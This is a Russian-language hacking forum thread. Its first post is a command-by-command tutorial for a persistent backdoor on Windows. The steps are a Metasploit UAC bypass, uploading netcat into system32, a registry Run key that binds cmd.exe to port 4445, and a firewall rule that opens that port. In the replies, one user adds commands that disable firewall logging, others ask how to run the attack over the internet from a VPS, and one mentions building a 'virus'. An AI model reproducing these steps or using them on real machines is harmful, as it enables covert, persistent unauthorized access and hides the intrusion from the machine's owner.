Permanent Backdoor

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 31 окт 2016.

Наш партнер Genesis Hackspace
  1. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    Привет! В данной публикации, я покажу, как осуществить постоянный доступ к уязвимому, к примеру, посредством reverse shell (meterpreter) компьютеру.

    Permanent Backdoor

    В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109. Итак, нам понадобится открытая сессия meterpreter:

    Permanent Backdoor

    Для продолжения, необходимо обойти UAC на целевом хосте:

    > use exploit/windows/local/bypassuac_injection

    И по порядку выполняем команды, как показано на скриншоте ниже:

    Permanent Backdoor

    В случае успеха вывод команды getsystem будет таким:

    Permanent Backdoor

    Теперь, необходимо загрузить на целевую систему программу netcat - это утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Делается это следующим образом, вводим в консоли meterpreter:

    > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

    Permanent Backdoor


    Затем редактируем реестр цели, для запуска netcat при загрузке:

    > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat –d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’


    Permanent Backdoor

    Открываем shell, для того чтобы внести свои поправки в firewall целевого хоста.

    > shell

    Permanent Backdoor

    Вносим правило в firewall:

    > netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

    netsh —
    программа, включенная в линейку продуктов операционных систем Microsoft Windows NT начиная с Windows 2000. Она позволяет осуществлять локальное или удаленное конфигурирование сетевых параметров.

    Permanent Backdoor

    Убедимся, что наши усилия не прошли даром, и правило было успешно добавлено:

    > netsh firewall show portopening

    Permanent Backdoor

    Все ок. Перезагрузим целевой хост, а перед этим откроем второй терминал в Kali и введем команду:

    > nc -nv 192.168.0.109 4445 (Где 192.168.0.109 – адрес целевой машины)

    После перезагрузки получаем shell на целевой системе:

    Permanent Backdoor
     
    Георгий, gx6060, veterok и 2 другим нравится это.
  2. cepgio

    cepgio New Member

    Регистрация:
    13 окт 2016
    Сообщения:
    1
    Симпатии:
    0
    отлично, автор молодец!
     
  3. dandu

    dandu Member

    Регистрация:
    19 окт 2016
    Сообщения:
    11
    Симпатии:
    1
    После ввода команды "exploit" выводит ошибку:
    Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
    Exploit complated, but no session was created.
     
  4. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    А прикрепите скрин пожалуйста
     
  5. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    26
    Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
     
  6. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    В начале писал - В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109.
     
  7. dandu

    dandu Member

    Регистрация:
    19 окт 2016
    Сообщения:
    11
    Симпатии:
    1
     

    Вложения:

  8. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    Очевидно же, что эксплойт ругается на номер сессии. У вас точно есть активная сессия meterpreter под номером 1?
     
  9. MAdDog719

    MAdDog719 Well-Known Member
    Grey Team

    Регистрация:
    16 авг 2016
    Сообщения:
    110
    Симпатии:
    26
    сори, не обратил внимания)
     
  10. objque

    objque New Member

    Регистрация:
    5 ноя 2016
    Сообщения:
    1
    Симпатии:
    0
    Возможно ли настроиться для работы не из одной локальной сети?
    В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

    Все примеры по reverse_tcp только в локальной сети :(

    Надеюсь на вашу помощь, спасибо!
     
  11. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ - Посмотрите тут, эта схема работает
     
  12. kot-gor

    kot-gor Well-Known Member
    Команда форума Grey Team

    Регистрация:
    7 сен 2016
    Сообщения:
    175
    Симпатии:
    126
    Добрый день,, все тоже самое..только место локального своего ip указываете ip на vps.Бывают конечно небольшие отличия , но это зависит от каждого конкретного случая,некоторые виды пентеста можно сделать только в сегменте локальной сети.Иногда у меня сессия не работает с reverse_tcp я тогда заменяю на reverse_https.Старайтесь не действовать по шаблону.,шаблон хорош когда вы осваиваете. Я вообще пентест сравниваю с шахматами,но это сугубо мое личное мнение.
     
    Vander нравится это.
  13. koldonuuchu

    koldonuuchu Active Member
    Команда форума Grey Team

    Регистрация:
    4 ноя 2016
    Сообщения:
    36
    Симпатии:
    37
    Хочу посоветовать вам начать с основ сетей (проброс порта, классы подсетей и т.д) И у вас не будет таких вопросов
     
    Vander нравится это.
  14. Ishikawa

    Ishikawa Well-Known Member
    Команда форума Grey Team

    Регистрация:
    15 ноя 2016
    Сообщения:
    98
    Симпатии:
    95
    На каком-то сайте я уже видел эту статью, только английскую версию.
     
  15. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    exploit/windows/local/bypassuac_injection - Очень древний, статей по нему масса, и видео тоже. Я на своей машине проверил и описал.
     
  16. Ishikawa

    Ishikawa Well-Known Member
    Команда форума Grey Team

    Регистрация:
    15 ноя 2016
    Сообщения:
    98
    Симпатии:
    95
    На всякий случай: если нужно добавить правила в огнестенку на Winxp, то advfirewall не работает.
    Нуно что-то вроде:
    netsh firewall add portopening protocol=TCP port=4445 name=netcat
    netsh firewall add allowedprogram C:\WINDOWS\System32\nc.exe

    И не мешало бы:
    netsh firewall set logging %systemroot%\system32\LogFiles\Firewall\pfirewall.log 4096 DISABLE DISABLE
     
    Vander нравится это.
  17. Ishikawa

    Ishikawa Well-Known Member
    Команда форума Grey Team

    Регистрация:
    15 ноя 2016
    Сообщения:
    98
    Симпатии:
    95
    p.s. и есть одно важное уточнение. Допустим получили meterpreter-сессию.
    Пробуем добавить правила в фаерволл, и если нам сообщается, что он выключен, то его нужно включить (пример для WinXP):
    sc config SharedAccess start= auto
    а потом запустим net start SharedAccess. Через минуту потеряем сессию.
    При повторной попытке провести эксплойт, msf вам радостно сообщит, что эксплойт прошел, но сессию создать никак не выйден.
    Nmap -v <host> -p <port> вам покажет печальную картину, что все порты фильтруются.
    Т.о. сами отрубим себе руки :)
     
    ghostphisher и Vander нравится это.
  18. thunder

    thunder Well-Known Member

    Регистрация:
    8 дек 2016
    Сообщения:
    135
    Симпатии:
    13
    Vander: Вы уж ..простите за глупый вопрос.. Данным способом можно получить права администратора (getsystem) на windows 7 ?
     
  19. Vander

    Vander Модератор
    Команда форума Grey Team

    Регистрация:
    16 янв 2016
    Сообщения:
    499
    Симпатии:
    802
    Можно
     
  20. thunder

    thunder Well-Known Member

    Регистрация:
    8 дек 2016
    Сообщения:
    135
    Симпатии:
    13
    Vander: Уж не знаю ..правильно ли я делал :) . Сам вирус делал по этому (видео) , дальше дела по вашему гайду .. Сюда по всему что то получилось ... Еще раз вопрос .. сие действие возможно сделать в глобальной сети (я имею ввиду не только на виртуальной машине ) ? Как то непонятно(улыбнуло) мне в команде слово "local"
     
Загрузка...

Поделиться этой страницей